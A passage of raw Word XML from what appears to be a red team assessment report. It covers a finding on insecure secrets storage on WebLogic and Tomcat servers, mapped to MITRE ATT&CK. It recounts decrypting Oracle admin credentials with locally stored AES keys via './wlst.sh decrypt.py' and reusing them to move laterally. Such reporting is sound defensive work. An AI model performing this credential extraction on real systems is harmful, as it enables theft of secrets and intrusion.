      </w:r>
      <w:r w:rsidR="00503324" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">on all ETS WebLogic and Tomcat servers </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>to validate their legitimacy and remove any unnecessary or outdated entries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E69ED6" w14:textId="5299166E" w:rsidR="0020401E" w:rsidRPr="001019D3" w:rsidRDefault="00AC0461" w:rsidP="00503324">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="0020401E" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">mplement file integrity monitoring (FIM) on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0020401E" w:rsidRPr="001019D3">
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0020401E" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> configuration files </w:t>
      </w:r>
      <w:r w:rsidR="00503324" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">on all ETS WebLogic and Tomcat servers </w:t>
      </w:r>
      <w:r w:rsidR="0020401E" w:rsidRPr="001019D3">
        <w:t>to detect unauthorized changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737FAC75" w14:textId="4C7AC8A9" w:rsidR="0020401E" w:rsidRPr="001019D3" w:rsidRDefault="0020401E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DCC1D9" w14:textId="1DFB4F77" w:rsidR="00813E2E" w:rsidRPr="001019D3" w:rsidRDefault="0020401E" w:rsidP="00813E2E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:pageBreakBefore/>
        <w:ind w:left="734" w:hanging="734"/>
      </w:pPr>
      <w:bookmarkStart w:id="165" w:name="_Toc198044925"/>
      <w:bookmarkStart w:id="166" w:name="_Ref198135870"/>
      <w:bookmarkStart w:id="167" w:name="_Ref198198019"/>
      <w:bookmarkStart w:id="168" w:name="_Ref209717721"/>
      <w:bookmarkStart w:id="169" w:name="_Ref209719132"/>
      <w:bookmarkStart w:id="170" w:name="_Toc209809055"/>
      <w:bookmarkStart w:id="171" w:name="_Ref212824973"/>
      <w:bookmarkStart w:id="172" w:name="_Ref212829129"/>
      <w:bookmarkStart w:id="173" w:name="_Ref213099208"/>
      <w:bookmarkStart w:id="174" w:name="_Toc213253569"/>
      <w:bookmarkEnd w:id="159"/>
      <w:bookmarkEnd w:id="160"/>
      <w:bookmarkEnd w:id="161"/>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:t>Insecure credentials and secrets storage</w:t>
      </w:r>
      <w:bookmarkEnd w:id="165"/>
      <w:bookmarkEnd w:id="166"/>
      <w:bookmarkEnd w:id="167"/>
      <w:bookmarkEnd w:id="168"/>
      <w:bookmarkEnd w:id="169"/>
      <w:bookmarkEnd w:id="170"/>
      <w:bookmarkEnd w:id="171"/>
      <w:bookmarkEnd w:id="172"/>
      <w:bookmarkEnd w:id="173"/>
      <w:bookmarkEnd w:id="174"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>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0"/>
        <w:gridCol w:w="1728"/>
        <w:gridCol w:w="2266"/>
        <w:gridCol w:w="3954"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A9423C" w:rsidRPr="001019D3" w14:paraId="7B7857A0" w14:textId="77777777" w:rsidTr="009C7798">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60059632" w14:textId="77777777" w:rsidR="00813E2E" w:rsidRPr="001019D3" w:rsidRDefault="00813E2E" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Rating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="984" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="515FD973" w14:textId="77777777" w:rsidR="00813E2E" w:rsidRPr="001019D3" w:rsidRDefault="00813E2E" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Impacted assets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3543" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6525F016" w14:textId="77777777" w:rsidR="00813E2E" w:rsidRPr="001019D3" w:rsidRDefault="00813E2E" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ATT&amp;CK MITRE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C7798" w:rsidRPr="001019D3" w14:paraId="3F10AED9" w14:textId="77777777" w:rsidTr="006F5C7A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52C69AF2" w14:textId="443B6A2E" w:rsidR="00813E2E" w:rsidRPr="001019D3" w:rsidRDefault="009C7798" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="984" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28331FA4" w14:textId="1844A637" w:rsidR="00813E2E" w:rsidRPr="001019D3" w:rsidRDefault="009C7798" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ETS WebLogic and Tomcat servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1291" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4C51955E" w14:textId="3BC17F70" w:rsidR="00813E2E" w:rsidRPr="001019D3" w:rsidRDefault="00813E2E" w:rsidP="00C84E88">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="840" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA-</w:t>
            </w:r>
            <w:r w:rsidR="00F86A7F" w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0006</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70DC193A" w14:textId="137A7021" w:rsidR="00813E2E" w:rsidRPr="001019D3" w:rsidRDefault="00F86A7F" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2252" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="66BA83C3" w14:textId="77777777" w:rsidR="009C7798" w:rsidRPr="001019D3" w:rsidRDefault="00813E2E" w:rsidP="00C84E88">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w:t>
            </w:r>
            <w:r w:rsidR="00F86A7F" w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1552.001</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46C0BD5B" w14:textId="3BE8A543" w:rsidR="00813E2E" w:rsidRPr="001019D3" w:rsidRDefault="00F86A7F" w:rsidP="00C84E88">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">Unsecured Credentials: </w:t>
            </w:r>
            <w:r w:rsidR="00EA36F8" w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>Credentials In Files</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65E5B816" w14:textId="77777777" w:rsidR="009C7798" w:rsidRPr="001019D3" w:rsidRDefault="00F86A7F" w:rsidP="00C84E88">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T1552.004</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A95C378" w14:textId="0B059BCC" w:rsidR="00F86A7F" w:rsidRPr="001019D3" w:rsidRDefault="00F86A7F" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>Unsecured Credentials: Private Keys</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EDB9598" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">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T1649</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B2D2C7D" w14:textId="2906E43A" w:rsidR="00813E2E" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00C84E88">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>Steal or Forge Authentication Certificates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5A7DFAAD" w14:textId="77777777" w:rsidR="00813E2E" w:rsidRPr="001019D3" w:rsidRDefault="00813E2E" w:rsidP="00C84E88">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A00BD24" w14:textId="135DD65E" w:rsidR="00F53DA0" w:rsidRPr="001019D3" w:rsidRDefault="00F53DA0" w:rsidP="00C84E88">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00AC0461" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00AC0461" w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref209791354 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00AC0461" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>4.3.2</w:t>
      </w:r>
      <w:r w:rsidR="00AC0461" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00C84E88" w:rsidRPr="001019D3">
        <w:t>), local reconnaissance was performed on the hosts</w:t>
      </w:r>
      <w:r w:rsidR="00993EB0" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> to reveal sensitive files</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE8A69C" w14:textId="7B33253E" w:rsidR="00F86A7F" w:rsidRPr="001019D3" w:rsidRDefault="00993EB0" w:rsidP="00C84E88">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">While reading the files on the disk, the Red Team revealed </w:t>
      </w:r>
      <w:r w:rsidR="00C84E88" w:rsidRPr="001019D3">
        <w:t>sensitive information such as passwords, and authentication tokens were stored on the systems and were able to be accessed by the compromised user. These secrets were found either in cleartext or encrypted within configuration files, scripts, environment variables, or in other easily accessible locations on the compromised hosts. Insecurely storing secrets significantly increases the risk of credential being leaked, as unauthorised users who gain access to the effected systems, either directly or through lateral movement, could obtain them. Once collected, these credentials can be used to access other systems, escalate privileges, or propagate further in the environment, potentially leading to full domain compromise or unauthorised access to cloud services and databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F4B407" w14:textId="7C3B4A24" w:rsidR="00C84E88" w:rsidRPr="001019D3" w:rsidRDefault="00C84E88" w:rsidP="00C84E88">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FA8EC6" w14:textId="28442D01" w:rsidR="00AC0461" w:rsidRPr="001019D3" w:rsidRDefault="00AC0461" w:rsidP="00AE5D38">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Several instances of insecure secret storage were identified on compromised servers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FA793A" w14:textId="77777777" w:rsidR="00AC0461" w:rsidRPr="001019D3" w:rsidRDefault="00AC0461" w:rsidP="00AC0461">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Oracle credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C67D3FF" w14:textId="75FCD1E6" w:rsidR="00AE5D38" w:rsidRPr="001019D3" w:rsidRDefault="00AE5D38" w:rsidP="00AE5D38">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The Red Team was able to find one configuration file in the WebLogic installation folder. This configuration file contains system and sysop, high privileges users, that can connect to any Oracle product communicating on an exposed T3 protocol. Credentials in these configuration files are however encrypted. WebLogic uses AES keys to encrypt and decrypt these credentials, and those keys are also stored in accessible configuration files on the same system.</w:t>
      </w:r>
      <w:r w:rsidR="002B3751" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">The Red Team, having access to the server was able to decrypt and extract the credentials via the pre-installed </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:rStyle w:val="MacroTextChar1"/>
        </w:rPr>
        <w:t>wlst.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> script interface (installed within the WebLogic’s installation folder – this comes by default when installing any WebLogic server) using a custom developed </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:rStyle w:val="MacroTextChar1"/>
        </w:rPr>
        <w:t>decrypt.py</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>script that runs commands to output decrypted user credentials using the discovered AES keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE5F153" w14:textId="0A6B2242" w:rsidR="00AE5D38" w:rsidRPr="001019D3" w:rsidRDefault="00AE5D38" w:rsidP="00AE5D38">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Furthermore, the decrypted credentials were tested and used successfully to authenticate to other Oracle services, enabling lateral movement and further compromise </w:t>
      </w:r>
      <w:r w:rsidR="00A50E21" w:rsidRPr="001019D3">
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> other WebLogic servers or Oracle Database servers via the T3 protocol.</w:t>
      </w:r>
      <w:r w:rsidR="00A50E21" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Using the same script it was possible to </w:t>
      </w:r>
      <w:r w:rsidR="00A50E21" w:rsidRPr="001019D3">
        <w:t>decrypt passwords t</w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">hat remote Oracle servers contained, that were not reachable from the currently connected system. This allowed accessing </w:t>
      </w:r>
      <w:r w:rsidR="00A50E21" w:rsidRPr="001019D3">
        <w:t>Oracle Database</w:t>
      </w:r>
      <w:r w:rsidR="00907575" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">passwords </w:t>
      </w:r>
      <w:r w:rsidR="00907575" w:rsidRPr="001019D3">
        <w:t>and successfully connect</w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00907575" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> to the</w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> database instances</w:t>
      </w:r>
      <w:r w:rsidR="00AB312F" w:rsidRPr="001019D3">
        <w:t>, including EUTL acceptance, which contained one of the flags put in place by CLIMA for this campaign</w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32171B12" w14:textId="4C5EF4F7" w:rsidR="00813E2E" w:rsidRPr="001019D3" w:rsidRDefault="00B063DE" w:rsidP="00AE5D38">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidR="005C6A22" w:rsidRPr="001019D3">
        <w:t>example,</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> in one of the affected hosts </w:t>
      </w:r>
      <w:r w:rsidR="00AE5D38" w:rsidRPr="001019D3">
        <w:t>the following was executed to decrypt passwords</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8746"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B063DE" w:rsidRPr="001019D3" w14:paraId="1921BD6D" w14:textId="77777777" w:rsidTr="00AE5D38">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9518" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0C905BE3" w14:textId="52AF824A" w:rsidR="00B063DE" w:rsidRPr="001019D3" w:rsidRDefault="00B063DE" w:rsidP="00AE5D38">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>./wlst.sh decrypt.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59266FDB" w14:textId="77777777" w:rsidR="00B063DE" w:rsidRPr="001019D3" w:rsidRDefault="00B063DE" w:rsidP="00AE5D38">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F32F025" wp14:editId="251A2DDF">
            <wp:extent cx="5530408" cy="3492500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="587476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6335" name="Picture 587476335"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5539024" cy="3497941"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48436EC8" w14:textId="2F2AF04A" w:rsidR="00B063DE" w:rsidRPr="001019D3" w:rsidRDefault="00B063DE" w:rsidP="00AE5D38">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="175" w:name="_Toc213253793"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00AE5D38" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">High-privileged </w:t>
      </w:r>
      <w:r w:rsidR="00AE5D38" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Oracle </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>credentials decrypt</w:t>
      </w:r>
      <w:r w:rsidR="00AE5D38" w:rsidRPr="001019D3">
        <w:t>ed using wlst.sh.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="175"/>
    </w:p>
    <w:p w14:paraId="7D1AF074" w14:textId="677B0192" w:rsidR="00B063DE" w:rsidRPr="001019D3" w:rsidRDefault="000A3E53" w:rsidP="000A3E53">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Screen clipping taken: 20/05/2025 12:34 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2A548A" w14:textId="20A03D10" w:rsidR="0037306A" w:rsidRPr="001019D3" w:rsidRDefault="0037306A" w:rsidP="00F533A7">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Furthermore, utilizing the credentials discovered on the compromised hosts it was possible to connect to the </w:t>
      </w:r>
      <w:r w:rsidR="001019D3" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">EUTL PUBLIC database in the acceptance environment, which contained a </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001019D3" w:rsidRPr="001019D3">
        <w:t>set by the ETS team</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CLIMA_ACC_olrdev20_EUTL_PUBLIC_EUCR) </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>which allow</w:t>
      </w:r>
      <w:r w:rsidR="001019D3" w:rsidRPr="001019D3">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
